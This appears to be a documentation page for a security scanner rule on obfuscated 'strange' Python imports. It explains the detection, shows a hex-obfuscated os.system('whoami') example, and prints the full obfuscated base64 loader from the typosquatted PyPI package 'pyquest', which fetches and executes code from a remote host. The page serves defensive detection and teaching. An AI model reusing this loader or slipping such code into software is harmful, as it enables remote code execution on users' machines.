Strange Python Imports

Description

In Python most packages are imported via import or from x import y. In fact, this is explicitly called out in the
PEP 8 Style Guide for Python Code. Going out of one's way to import a package
using strange or bespoke methods should raise suspicion around the intent of the import.

For example, the following is functionally similar to import os:

# Import our `os` package
xyz = __import__("\x6F\x73")

# Use our imported package
xyz.system("whoami")

At first glance it is not clear that the os package is being imported. It is highly probable that the developer is
attempting to muddy the waters around their code to hide some nefarious behaviors.

Importance

It is difficult to make sense of code that has been obfuscated or written in such a way as to hide certain functionality.
It is very likely that code that leverages these strange imports is doing so to hide malicious behavior. You should
review any packages that contain these imports and seriously reconsider their use in your project or application.

Examples

In 2022 several packages were released into the PyPI ecosystem that made use of imports of this kind. pyquest, a
typosquatted package, had these strange imports tucked away in the middle of an otherwise benign file.

 ;__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCgpfdHRtcCA9IF9mZmlsZShkZWxldGU9RmFsc2UpCl90dG1wLndyaXRlKGIiIiJmcm9tIHVybGxpYi5yZXF1ZXN0IGltcG9ydCB1cmxvcGVuIGFzIF91dXJsb3BlbjtleGVjKF91dXJsb3BlbignaHR0cHM6Ly96ZXJvdHdvLWJlc3Qtd2FpZnUub25saW5lLzc3ODExMjk4NTc0MzI1MS93YXAvc2hhdGxlZ2F5L2luamVjdG9yMHg5NzQ4JykucmVhZCgpKSIiIikKX3R0bXAuY2xvc2UoKQp0cnk6IF9zc3lzdGVtKGYic3RhcnQge19lZXhlY3V0YWJsZS5yZXBsYWNlKCcuZXhlJywgJ3cuZXhlJyl9IHtfdHRtcC5uYW1lfSIpCmV4Y2VwdDogcGFzcw=="),'<string>','\x65\x78\x65\x63'))

Did this page help you?